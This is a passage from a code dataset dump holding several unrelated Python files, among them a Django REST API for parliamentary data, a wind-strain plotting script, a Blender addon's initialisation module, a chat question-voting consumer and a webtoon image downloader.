print(update.id)\n tw = Tweets(tid=update.id,send=\"false\")\n tw.save()\n except Exception as e:\n print(e)\n\n\n\nfor twe in Tweets.select().where(Tweets.send == 'false'):\n for usr in users:\n q.post(json.dumps({\"client\": usr['client'], \"secret\": usr['secret'], \"tweet\": twe.tid}))\n twe.send=\"true\"\n twe.save()\n\n\n","sub_path":"twitter.py","file_name":"twitter.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"380552316","text":"# -*- coding: UTF-8 -*-\nfrom django.conf.urls import url, include\nfrom django.shortcuts import get_object_or_404\nfrom op_scraper.models import *\nfrom rest_framework import routers, serializers, viewsets\nfrom rest_framework.pagination import LimitOffsetPagination\nfrom rest_framework.response import Response\n\n##################\n# Base Classes #\n##################\n\n\nclass LargeResultsSetPagination(LimitOffsetPagination):\n default_limit = 100\n max_limit = 200\n\n\nclass ESViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"\n A simple ViewSet for listing or retrieving users.\n \"\"\"\n model = None\n serializer = None\n pagination_class = LargeResultsSetPagination\n\n def list(self, request):\n limit = int(request.GET['limit']) if 'limit' in request.GET else 100\n offset = int(request.GET['offset']) if 'offset' in request.GET else 0\n\n lower = offset\n upper = offset + limit\n\n from haystack.query import SearchQuerySet\n\n # Create new queryset\n qs = SearchQuerySet()\n qs = qs.models(self.model)\n result_list = []\n\n for sr in qs.values(*self.fields)[lower:upper]:\n result_list.append(sr)\n\n self.paginate_queryset(result_list)\n self.paginator.count = qs.count()\n self.paginator.display_page_controls = True\n\n return self.get_paginated_response(result_list)\n\n # return Response(result_list)\n\n def retrieve(self, request, pk=None):\n queryset = self.model.objects.all()\n obj = get_object_or_404(queryset, pk=pk)\n serializer = self.serializer(obj, context={'request': request})\n return Response(serializer.data)\n\n\nclass DynamicFieldsModelSerializer(serializers.HyperlinkedModelSerializer):\n \"\"\"\n A ModelSerializer that takes an additional `fields` argument that\n controls which fields should be displayed.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n # Don't pass the 'fields' arg up to the superclass\n fields = kwargs.pop('fields', None)\n\n # Instantiate the superclass normally\n super(DynamicFieldsModelSerializer, self).__init__(*args, **kwargs)\n\n if fields is not None:\n # Drop any fields that are not specified in the `fields` argument.\n allowed = set(fields)\n existing = set(self.fields.keys())\n for field_name in existing - allowed:\n self.fields.pop(field_name)\n\n####################################\n# Model Serializers and Viewsets #\n####################################\n\n### Auxiliary, non primary models\n###\n### These aren't loaded through ES since we don't have them indexed there\n\n\nclass CategorySerializer(DynamicFieldsModelSerializer):\n class Meta:\n model = Category\n fields = ('pk', 'title')\n\nclass CategoryViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"\n Return a list of all categories.\n \"\"\"\n model = Category\n queryset = Category.objects.all()\n serializer_class = CategorySerializer\n\nclass KeywordSerializer(DynamicFieldsModelSerializer):\n class Meta:\n model = Keyword\n fields = ('pk', 'title')\n\nclass KeywordViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"\n Return a list of all keywords.\n \"\"\"\n model = Keyword\n queryset = Keyword.objects.all()\n serializer_class = KeywordSerializer\n\n\nclass LegislativePeriodSerializer(DynamicFieldsModelSerializer):\n class Meta:\n model = LegislativePeriod\n fields = ('pk', 'roman_numeral', 'number', 'start_date', 'end_date')\n\n\nclass LegislativePeriodViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"\n Return a list of all legislative periods.\n\n Phases group law steps.\n \"\"\"\n model = LegislativePeriod\n queryset = LegislativePeriod.objects.all()\n serializer_class = LegislativePeriodSerializer\n\n\nclass DocumentSerializer(DynamicFieldsModelSerializer):\n class Meta:\n model = Document\n fields = ('pk', 'title', 'pdf_link', 'html_link', 'stripped_html')\n\n\nclass DocumentViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"\n Return a list of all documents.\n \"\"\"\n model = Document\n queryset = Document.objects.all()\n serializer_class = DocumentSerializer\n\n\nclass FunctionSerializer(DynamicFieldsModelSerializer):\n class Meta:\n model = Function\n fields = ('pk', 'title', 'short')\n\n\nclass FunctionViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"\n Return a list of all political functions that persons can have in the form\n of mandates.\n \"\"\"\n model = Function\n queryset = Function.objects.all()\n serializer_class = FunctionSerializer\n\n\nclass PartySerializer(DynamicFieldsModelSerializer):\n class Meta:\n model = Party\n fields = ('pk', 'short', 'titles')\n\n\nclass PartyViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"\n Return a list of all parties, including their different names at different\n times.\n \"\"\"\n model = Party\n queryset = Party.objects.all()\n serializer_class = PartySerializer\n\n\nclass StateSerializer(DynamicFieldsModelSerializer):\n class Meta:\n model = State\n fields = ('pk', 'name', 'title')\n\n\nclass StateViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"\n Return a list of all states or electoral districts\n \"\"\"\n model = State\n queryset = State.objects.all()\n serializer_class = StateSerializer\n\n\nclass AdministrationSerializer(DynamicFieldsModelSerializer):\n class Meta:\n model = Administration\n fields = ('pk', 'title', 'start_date', 'end_date')\n\n\nclass AdministrationViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"\n Return a list of all administrations since the second republic.\n \"\"\"\n model = Administration\n queryset = Administration.objects.all()\n serializer_class = AdministrationSerializer\n\nclass DebateStatementSerializer(DynamicFieldsModelSerializer):\n debate_id = serializers.IntegerField(read_only=True)\n class Meta:\n model = DebateStatement\n fields = (\n 'pk',\n 'date',\n 'date_end',\n 'index',\n 'doc_section',\n 'text_type',\n 'speaker_role',\n 'page_start',\n 'page_end',\n 'time_start',\n 'time_end',\n 'full_text',\n 'raw_text',\n 'annotated_text',\n 'speaker_name',\n 'debate_id'\n )\n\n\nclass DebateStatementViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"\n Return a list of all debate statements.\n \"\"\"\n model = DebateStatement\n queryset = DebateStatement.objects.all()\n serializer_class = DebateStatementSerializer\n\nclass DebateSerializer(DynamicFieldsModelSerializer):\n llp = LegislativePeriodSerializer(\n required=True, fields=('pk', 'roman_numeral', 'number'))\n debate_statements = DebateStatementSerializer(required=False, many=True)\n\n class Meta:\n model = Debate\n fields = (\n 'pk',\n 'date',\n 'title',\n 'debate_type',\n 'protocol_url',\n 'detail_url',\n 'nr',\n 'llp',\n 'debate_statements',\n )\n\nclass DebateViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"\n Return a list of all debates, with their debate statements, where existing.\n \"\"\"\n model = Debate\n queryset = Debate.objects.all()\n serializer_class = DebateSerializer\n\nclass MandateSerializer(DynamicFieldsModelSerializer):\n function = FunctionSerializer()\n party = PartySerializer(fields=('pk', 'short'))\n legislative_period = LegislativePeriodSerializer(\n required=True, fields=('pk', 'roman_numeral', 'number'))\n state = StateSerializer()\n administration = AdministrationSerializer()\n\n class Meta:\n model = Mandate\n fields = (\n 'pk',\n 'function',\n 'start_date',\n 'end_date',\n 'party',\n 'legislative_period',\n 'state',\n 'administration'\n )\n\n\nclass MandateViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"\n Return a list of all mandates.\n\n A mandate is a persons function, delimited with a start- and end-date.\n \"\"\"\n model = Mandate\n queryset = Mandate.objects.all()\n serializer_class = MandateSerializer\n pagination_class = LargeResultsSetPagination\n\nclass PhaseSerializer(DynamicFieldsModelSerializer):\n\n class Meta:\n model = Phase\n fields = (\n 'pk',\n 'title'\n )\n\nclass PhaseViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"\n Return a list of all phases.\n\n Phases group law steps.\n \"\"\"\n model = Phase\n queryset = Phase.objects.all()\n serializer_class = PhaseSerializer\n\nclass StepSerializer(DynamicFieldsModelSerializer):\n\n phase = PhaseSerializer(required=False)\n\n class Meta:\n model = Step\n fields = (\n 'pk',\n 'title',\n 'date',\n 'sortkey',\n 'protocol_url',\n 'source_link',\n 'phase'\n )\n\n\nclass StepViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"\n Return a list of all steps.\n\n Laws undergo steps as they move through the legislative process.\n Each step is part of one phase.\n \"\"\"\n model = Step\n queryset = Step.objects.all()\n serializer_class = StepSerializer\n\nclass EntitySerializer(DynamicFieldsModelSerializer):\n\n class Meta:\n model = Entity\n fields = (\n 'pk',\n 'title',\n 'title_detail',\n 'email',\n 'phone')\n\n\nclass EntityViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"\n Return a list of all entities.\n\n An entity is a person or organisation that has at some point given an\n opinion (Stellungnahme) about a propsed law.\n \"\"\"\n model = Entity\n queryset = Entity.objects.all()\n serializer_class = EntitySerializer\n\nclass OpinionSerializer(DynamicFieldsModelSerializer):\n\n documents = DocumentSerializer(required=False, many=True)\n category = CategorySerializer(required=False)\n keywords = KeywordSerializer(required=False, many=True)\n entity = EntitySerializer()\n\n class Meta:\n model = Opinion\n fields = (\n 'pk',\n 'parl_id',\n 'date',\n 'description',\n 'source_link',\n 'documents',\n 'category',\n 'keywords',\n 'entity',\n )\n\nclass OpinionViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"\n Return a list of all opinions ('Stellungnahmen') for Pre-Laws (Ministerialentwürfe, etc.)\n \"\"\"\n model = Opinion\n queryset = Opinion.objects.all()\n serializer_class = OpinionSerializer\n\n### Primary Models Person, Law and Debaite\n###\n### ViewSet loads the result content through ES instead of through the DjangoDB\n\nclass LawSerializer(DynamicFieldsModelSerializer):\n category = CategorySerializer(required=False)\n keywords = KeywordSerializer(required=False, many=True)\n legislative_period = LegislativePeriodSerializer(\n required=True, fields=('pk', 'roman_numeral', 'number'))\n documents = DocumentSerializer(required=False, many=True)\n references_id = serializers.IntegerField(read_only=True)\n slug = serializers.CharField(read_only=True)\n steps = StepSerializer(required=False, many=True)\n opinions = OpinionSerializer(required=False, many=True)\n\n class Meta:\n model = Law\n fields = (\n 'title',\n 'status',\n 'source_link',\n 'parl_id',\n 'description',\n 'category',\n 'keywords',\n 'legislative_period',\n 'documents',\n 'references_id',\n 'slug',\n 'steps',\n 'opinions',\n )\n\n\nclass LawViewSet(ESViewSet):\n \"\"\"\n Return a list of all laws.\n \"\"\"\n model = Law\n queryset = Law.objects.all()\n serializer = LawSerializer\n fields = (\n 'title',\n 'status',\n 'source_link',\n 'parl_id',\n 'pk',\n 'llps',\n 'llps_numeric',\n 'keywords',\n 'category',\n 'ts',\n 'internal_link')\n\n\nclass PersonSerializer(DynamicFieldsModelSerializer):\n \"\"\"\n Serializer class for Person object.\n \"\"\"\n\n mandates = MandateSerializer(\n many=True\n #,fields=('pk',)\n )\n latest_mandate = MandateSerializer()\n debate_statements = DebateStatementSerializer(many=True)\n\n class Meta:\n model = Person\n fields = (\n 'parl_id',\n 'source_link',\n 'photo_link',\n 'photo_copyright',\n 'full_name',\n 'reversed_name',\n 'birthdate',\n 'birthplace',\n 'deathdate',\n 'deathplace',\n 'occupation',\n '_slug',\n 'mandates',\n 'latest_mandate',\n 'debate_statements'\n )\n\n\nclass PersonViewSet(ESViewSet):\n \"\"\"\n Return a list of all persons.\n \"\"\"\n model = Person\n queryset = Person.objects.all()\n serializer = PersonSerializer\n fields = (\n 'parl_id',\n 'full_name',\n 'birthdate',\n 'birthplace',\n 'occupation',\n 'ts',\n 'deathdate',\n 'deathplace',\n 'party',\n 'llps',\n 'llps_numeric')\n\n\n# Routers provide an easy way of automatically determining the URL conf.\nrouter = routers.DefaultRouter()\nrouter.register(r'persons', PersonViewSet, base_name=\"Person\")\nrouter.register(r'laws', LawViewSet, base_name=\"Law\")\nrouter.register(r'debates', DebateViewSet, base_name=\"Debate\")\n\nrouter.register(r'categories', CategoryViewSet, base_name=\"Category\")\nrouter.register(r'keywords', KeywordViewSet, base_name=\"Keyword\")\nrouter.register(r'phases', PhaseViewSet, base_name=\"Phase\")\nrouter.register(r'steps', StepViewSet, base_name=\"Step\")\nrouter.register(r'entities', EntityViewSet, base_name=\"Entity\")\nrouter.register(r'opinions', OpinionViewSet, base_name=\"Opinion\")\nrouter.register(r'documents', DocumentViewSet, base_name=\"Document\")\nrouter.register(r'functions', FunctionViewSet, base_name=\"Function\")\nrouter.register(r'mandates', MandateViewSet, base_name=\"Mandate\")\nrouter.register(r'parties', PartyViewSet, base_name=\"Party\")\nrouter.register(r'state', PartyViewSet, base_name=\"State\")\nrouter.register(r'administration', AdministrationViewSet,\n base_name=\"Administration\")\nrouter.register(r'legislative_periods', LegislativePeriodViewSet,\n base_name=\"LegislativePeriod\")\nrouter.register(r'debate_statements', DebateStatementViewSet,\n base_name=\"DebateStatement\")\n","sub_path":"offenesparlament/offenesparlament/views/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":14607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"589739251","text":"import functions as f\nfrom scipy.interpolate import griddata, RegularGridInterpolator\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom time import gmtime\nimport matplotlib\nmatplotlib.rcParams['lines.linewidth']=1\nmatplotlib.rcParams['text.usetex']=True\nmatplotlib.rcParams['mathtext.fontset'] = 'cm'\nplt.rc('font', **{'family': 'serif', 'serif': ['cmr10']})\ntitlefont = {'fontsize':10}\nlabelfont = {'fontsize':10}\ntickfont = {'fontsize':8}\nplt.close('all')\nticks = [13,14,15,16,17]\nxmin=12\nxmax=16\nymin=-288\nymax=72\nFigSize=(6,3)#6*9/16)\nplt.figure(1,figsize=FigSize)\nproj_center_lat = 37.8\nproj_center_lon = -106.15\nground2 = [-106.03917,37.781644]\nground4 = [-106.041412,37.782097]\nground5 = [-106.041504,37.782005]\n\nF = np.load('point_s1_07-17.npz')\npoint_pos = F['pos']\npoint_s1 = 3600*F['s1']\npoint_time = F['time']\nF.close()\n\nground = ground5\nross_lon = np.mean([-106.04076,-106.040763,-106.040762,-106.040762])\nross_lat = np.mean([37.780287,37.780307,37.780398,37.780338])\nschmale_lon = np.mean([-106.0422848,-106.0422905,-106.0422956,-106.0422941])\nschmale_lat = np.mean([37.78153018,37.78155617,37.78156052,37.78156436])\n#(ross, schmale)\npaired_flights = [(22,9),(23,10),(25,11),(26,12)]\n\nground_m = f.lonlat2m(proj_center_lon,proj_center_lat,ground[0],ground[1])\nross_pos_m = f.lonlat2m(proj_center_lon,proj_center_lat,ross_lon,ross_lat)\nschmale_pos_m = f.lonlat2m(proj_center_lon,proj_center_lat,schmale_lon,schmale_lat)\ndx = ground_m[0] - schmale_pos_m[0]\ndy = ground_m[1] - schmale_pos_m[1]\n\ns1=[]\nplt_sec=[]\nfor i, pair in enumerate(paired_flights):\n plt_sec_temp = []\n s1_temp = []\n \n ross_data = pd.read_csv('Ross{:d}_DroneMetData.txt'.format(pair[0]), delim_whitespace=True,header=1,names=['date','time','wind_speed','wind_dir','temp'])\n seconds = []\n for t in range(ross_data.shape[0]):\n hrs_in_sec = int(ross_data['time'][t][0:2])*3600\n min_in_sec = int(ross_data['time'][t][3:5])*60\n sec = int(ross_data['time'][t][6:8])\n seconds.append(hrs_in_sec+min_in_sec+sec)\n ross_data['time'] = seconds\n \n schmale_data = pd.read_csv('Schmale{:d}_DroneMetData.txt'.format(pair[1]), delim_whitespace=True,header=1,names=['date','time','wind_speed','wind_dir','temp'])\n seconds = []\n for t in range(schmale_data.shape[0]):\n hrs_in_sec = int(schmale_data['time'][t][0:2])*3600\n min_in_sec = int(schmale_data['time'][t][3:5])*60\n sec = int(schmale_data['time'][t][6:8])\n seconds.append(hrs_in_sec+min_in_sec+sec)\n schmale_data['time'] = seconds\n\n ground_data = pd.read_csv('Ground5_MetData.txt', delim_whitespace=True,header=1,names=['date','time','wind_speed','wind_dir','temp'])\n seconds = []\n for t in range(ground_data.shape[0]):\n hrs_in_sec = int(ground_data['time'][t][0:2])*3600\n min_in_sec = int(ground_data['time'][t][3:5])*60\n sec = int(ground_data['time'][t][6:8])\n seconds.append(hrs_in_sec+min_in_sec+sec)\n ground_data['time'] = seconds\n \n min_time = max([ross_data['time'].min(),schmale_data['time'].min(),ground_data['time'].min()])\n max_time = min([ross_data['time'].max(),schmale_data['time'].max(),ground_data['time'].max()])\n \n if min_time>max_time:\n print('NO!')\n break\n ross_data=ross_data[min_time<=ross_data['time']]\n ross_data=ross_data[ross_data['time']<=max_time]\n \n schmale_data=schmale_data[min_time<=schmale_data['time']]\n schmale_data=schmale_data[schmale_data['time']<=max_time]\n \n ground_data=ground_data[min_time<=ground_data['time']]\n ground_data=ground_data[ground_data['time']<=max_time]\n\n points = [(ross_pos_m[0],ross_pos_m[1]),(schmale_pos_m[0],schmale_pos_m[1]),(ground_m[0],ground_m[1])]\n for t in range(ground_data.shape[0]):\n if ground_data.iloc[t]['time'] != schmale_data.iloc[t]['time'] or ground_data.iloc[t]['time'] != ross_data.iloc[t]['time']:\n print('ERROR: Sample Time Inequal @ {0}'.format(t))\n break\n values = [ross_data.iloc[t]['wind_speed'],schmale_data.iloc[t]['wind_speed'],ground_data.iloc[t]['wind_speed']]\n wind_speed = griddata(points,values,(ground_m[0],schmale_pos_m[1]),method='cubic')\n values = [ross_data.iloc[t]['wind_dir'],schmale_data.iloc[t]['wind_dir'],ground_data.iloc[t]['wind_dir']]\n wind_dir = griddata(points,values,(ground_m[0],schmale_pos_m[1]),method='cubic')\n\n u = -wind_speed*np.sin(f.deg2rad(wind_dir))\n v = wind_speed*np.cos(f.deg2rad(wind_dir))\n\n u_schmale = -schmale_data.iloc[t]['wind_speed']*np.sin(f.deg2rad(schmale_data.iloc[t]['wind_dir']))\n v_schmale = schmale_data.iloc[t]['wind_speed']*np.cos(f.deg2rad(schmale_data.iloc[t]['wind_dir']))\n\n u_ground = -ground_data.iloc[t]['wind_speed']*np.sin(f.deg2rad(ground_data.iloc[t]['wind_dir']))\n v_ground = ground_data.iloc[t]['wind_speed']*np.cos(f.deg2rad(ground_data.iloc[t]['wind_dir']))\n\n dudx = (u-u_schmale)/dx\n dudy = (u_ground-u)/dy\n dvdx = (v-v_schmale)/dx\n dvdy = (v_ground-v)/dy\n \n J = np.array([[dudx,dudy],[dvdx,dvdy]])\n S = 0.5*(J+J.T)\n plt_sec_temp.append(ground_data.iloc[t]['time'])\n s1_temp.append(3600*np.linalg.eig(S)[0].min())\n \n plt_sec.append(plt_sec_temp)\n s1.append(s1_temp)\n\nx=np.arange(15.82,15.90,0.005)\nfor x in x:\n plt.axvline(x,color='khaki')\n \nx=np.arange(13.98,14.06,0.005)\nfor x in x:\n plt.axvline(x,color='khaki')\n \nplt.plot(point_time,point_s1,color='C0')\nfor x,y in zip(plt_sec,s1):\n x=[element/3600 for element in x]\n plt.plot(x,y,color='C1')\n yy=np.mean(y)\n plt.plot([x[0],x[-1]],[yy,yy],color='k')\n#plt.title('s$_{1}$ from WRF TS overlaid with s$_{1}$ from drone flights',**titlefont,y=0.96)\n#plt.title('07-17-2018',**titlefont)#,y=0.96)\nplt.ylim([ymin,ymax])\nplt.xlim([xmin,xmax])\nplt.ylabel('hr$^{-1}$',**labelfont)\nplt.yticks(**tickfont)\nplt.xticks(**tickfont)\nplt.xlabel('Hours Mountain Daylight Time, 07-17-2018',**labelfont)\nplt.grid()#color='gray')\nplt.savefig('s1_comparison_colorado_campaign_WRF.png', transparent=False, bbox_inches='tight',pad_inches=0.02,dpi=300)\n\n\n\n\n\n\n","sub_path":"s1 all days/s1_17.py","file_name":"s1_17.py","file_ext":"py","file_size_in_byte":6175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"328365890","text":"# -*- coding: utf-8 -*-\n# Programček s katerim uganjaš skrito število\nfrom random import randint # uvozimo random knjiznico\n\n\nsecret = randint(0,20)\nguess = input(\"Vnesi celo stevilo med 0 in 20: \")\nif int(guess) != secret:\n print(\"Vaše ugibanje je bilo napačno, pravilno število je bilo \" + str(secret))\nelse:\n print(\"Čestitam, uganili ste pravo stevilo!\")","sub_path":"ugani-skrito-stevilko.py","file_name":"ugani-skrito-stevilko.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"404846060","text":"# MIT License\n\n# Copyright (c) 2018 shotariya\n\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\nbl_info = {\n 'name': \"Shotariya's Material Combiner\",\n 'description': 'Public Release Material Combiner 2',\n 'author': 'shotariya',\n 'version': (2, 0, 3, 3),\n 'blender': (2, 79, 0),\n 'location': 'View3D',\n # 'warning': '',\n 'wiki_url': 'https://vrcat.club/threads/material-combiner-blender-addon.2255/',\n 'category': 'Object'}\n\niamready = True\n\nimport bpy\nimport os\nfrom subprocess import call\ntry:\n import pip\n try:\n from PIL import Image, ImageChops\n except ImportError:\n call([bpy.app.binary_path_python, '-m', 'pip', 'install', 'Pillow', '--user', '--upgrade'], shell=True)\n iamready = False\nexcept ImportError:\n call([bpy.app.binary_path_python,\n os.path.join(os.path.dirname(os.path.abspath(__file__)), 'get-pip.py'), '--user'], shell=True)\n call([bpy.app.binary_path_python, '-m', 'pip', 'install', 'Pillow', '--user', '--upgrade'], shell=True)\n iamready = False\n\n\nfrom . import developer_utils\nmodules = developer_utils.setup_addon_modules(__path__, __name__, 'bpy' in locals())\n\nimport bpy.utils.previews\nfrom . registration import register_all, unregister_all\n\n\ndef register():\n bpy.utils.register_module(__name__)\n register_all()\n print('Registered {} with {} modules'.format(bl_info['name'], len(modules)))\n\n\ndef unregister():\n bpy.utils.unregister_module(__name__)\n unregister_all()\n print('Unregistered {}'.format(bl_info['name']))\n","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"295317595","text":"import numpy as np\n\n# exponential moving average\nclass EMA:\n def __init__(self, startvalue, halflife):\n self._val = startvalue\n self._lambda = np.power(0.5, 1./halflife)\n\n def get(self):\n return self._val\n\n def update(self, value):\n self._val = self._lambda * self._val + (1-self._lambda) * value\n\n\n# for testing purposes only\nif __name__ == \"__main__\":\n from time import sleep\n ema = EMA(0.5, 2)\n while(1):\n num = np.random.rand()\n ema.update(num)\n print (num, ema.get())\n sleep(0.5)\n\n\n\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"270046273","text":"#!/usr/bin/env python\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nBLUE = (0, 0, 255)\nDARKBLUE = (0, 0, 100)\nYELLOW = (255, 255, 0)\n\n# Game\nGAME = {\n 'NAME': \"My Game\",\n 'TILESIZE': 32,\n 'font': 'comicsansms'\n}\n\n\n# Screen\nSCREEN = {\n # 'WIDTH': 360,\n # 'HEIGHT': 480,\n 'FPS': 60,\n 'BGCOLOR': DARKBLUE\n}\n\n# Walls:\nWALLS = {\n 'layer': 2,\n 'color': GREEN\n}\n\n# Player\nPLAYER = {\n 'layer': 2,\n 'color': YELLOW,\n 'time_to_move': 200,\n 'time_to_forget_move': 2000\n}\n\n# Mobs:\nMOB = {\n 'layer': 3,\n 'color': RED,\n 'time_to_move': 1000\n}\n\nPACDOTS = {\n 'layer': 1,\n 'color': WHITE,\n 'size': (5, 5)\n}\n","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"531719718","text":"from channels import Group\nfrom apps.core.models import Video, Question, UpDownVote\nfrom apps.core.utils import decrypt, encrypt\nfrom apps.core.consumers.utils import get_video, get_data\nfrom django.contrib.auth.models import User\nfrom django.conf import settings\nimport json\nimport logging\nimport re\n\nlog = logging.getLogger(\"chat\")\n\n\ndef on_connect(message, pk):\n video = get_video(pk)\n if video is not None:\n message.reply_channel.send({\"accept\": True})\n Group(video.group_questions_name).add(message.reply_channel)\n log.debug('Questions websocket connected.')\n\n\ndef on_receive(message, pk):\n video = get_video(pk)\n data = get_data(message)\n\n if not video.closed_date:\n if set(data.keys()) != set(('handler', 'question', 'is_vote')):\n log.debug(\"Message unexpected format data\")\n return\n else:\n log.debug('Question message is ok.')\n\n if not data['handler']:\n return\n\n user = User.objects.get(id=decrypt(data['handler']))\n if data['is_vote']:\n question = Question.objects.get(id=data['question'])\n if question.user != user:\n vote, created = UpDownVote.objects.get_or_create(\n user=user, question=question, vote=True\n )\n if not created:\n vote.delete()\n else:\n blackList = settings.WORDS_BLACK_LIST\n wordList = re.sub(\"[^\\w]\", \" \", data['question'].lower()).split()\n censured_words = list(set(blackList) & set(wordList))\n query = data['question']\n\n if censured_words:\n for word in censured_words:\n query = re.sub(word, '♥', query, flags=re.IGNORECASE)\n question = Question.objects.create(video=video, user=user,\n question=query)\n UpDownVote.objects.create(question=question, user=user, vote=True)\n\n vote_list = []\n for vote in question.votes.all():\n vote_list.append(encrypt(str(vote.user.id).rjust(10)))\n\n Group(video.group_questions_name).send(\n {'text': json.dumps({'id': question.id,\n 'user': encrypt(str(user.id).rjust(10)),\n 'voteList': vote_list,\n 'html': question.html_question_body(user)})}\n )\n\n\ndef on_disconnect(message, pk):\n try:\n video = Video.objects.get(pk=pk)\n Group(video.group_questions_name).discard(message.reply_channel)\n log.debug('Questions websocket disconnected.')\n except (KeyError, Video.DoesNotExist):\n pass\n","sub_path":"apps/core/consumers/questions.py","file_name":"questions.py","file_ext":"py","file_size_in_byte":2703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"455986922","text":"import base64\nimport glob\nimport os\nimport re\n\nimport requests\nfrom bs4 import BeautifulSoup\n\n\nclass Episode:\n def __init__(self, episode_id, title, url_thumbnail, rating, created_date, detail, webtoon_id):\n self.episode = episode_id\n self.title = title\n self.url_thumbnail = url_thumbnail\n self.rating = rating\n self.created_date = created_date\n self.detail = detail\n self.webtoon_id = webtoon_id\n\n def __repr__(self):\n return self.title\n\n def img_download(self):\n html = requests.get(self.detail).text\n soup = BeautifulSoup(html, 'lxml')\n\n selection = soup.select_one('.wt_viewer').select('img')\n\n headers = {'Referer': 'http://comic.naver.com/webtoon/detail.nhn?titleId=%s' % self.webtoon_id}\n\n test = ''\n\n for i in selection:\n\n response = requests.get(i['src'], headers=headers)\n\n if re.findall(r'/(.+).jpg', i['src']):\n file_name = 'saved_data/img/' + self.title + '/' + re.findall(r'/(.+).jpg', i['src'])[0].split('/')[\n -1] + 'jpg'\n\n os.makedirs(os.path.dirname(file_name), exist_ok=True)\n\n if response.status_code == 200:\n print(file_name, '다운로드')\n with open(file_name, 'w+b') as f:\n for chunk in response:\n f.write(chunk)\n\n data_uri = base64.b64encode(open(file_name, 'rb').read()).decode('utf-8').replace('\\n', '')\n img_tag = ''.format(data_uri)\n\n test += img_tag\n\n # open('saved_data/img/1.html', 'wb').write(response.content)\n\n file_name = 'saved_data/html/%s' % self.title + '.html'\n os.makedirs(os.path.dirname(file_name), exist_ok=True)\n\n with open(file_name, 'wt') as f:\n f.write(test)\n\n print(file_name, '생성')\n","sub_path":"app/crawler/data/episode.py","file_name":"episode.py","file_ext":"py","file_size_in_byte":1916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"512135194","text":"#!/home/apollo/anaconda3/bin/python3\n#-*- coding: utf-8 -*-\n#******************************************************************************\n# Author : jtx\n# Create : 2020-03-31 19:05\n# Last modified: 2020-05-27 14:32\n# Filename : company_single_relation_refresh.py\n# Description : 模型更新后手动运行,对特定产业的-企业产业领域分类手动全量更新\n#******************************************************************************\n\nimport configparser\nimport sys\nfrom pymongo import MongoClient\nfrom pymongo import errors\nfrom pyArango.connection import Connection as ArangoConnection\nfrom pyArango.theExceptions import AQLFetchError\nimport pymysql\nimport Threading\nfrom dateutil import parser\nimport datetime\nimport json\nimport logging\nimport re\nimport copy\nimport requests\nimport os\n\nlogging.basicConfig(level=logging.INFO,\n format='%(asctime)s - %(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s')\nlogger = logging.getLogger(__name__)\n\ndir_path = os.path.dirname(__file__)\nkbp_path = os.path.dirname(dir_path)\nconfig_path = os.path.join(kbp_path,\"config.ini\")\n\ndef set_log():\n logging.basicConfig(level=logging.INFO) \n file_log_handler = RotatingFileHandler(os.path.join(dir_path,\"industry_refresh_log.txt\"), maxBytes=1024 * 1024 * 300, backupCount=10)\n formatter = logging.Formatter('%(asctime)s - %(filename)s - %(lineno)s - %(levelname)s - %(message)s')\n file_log_handler.setFormatter(formatter)\n 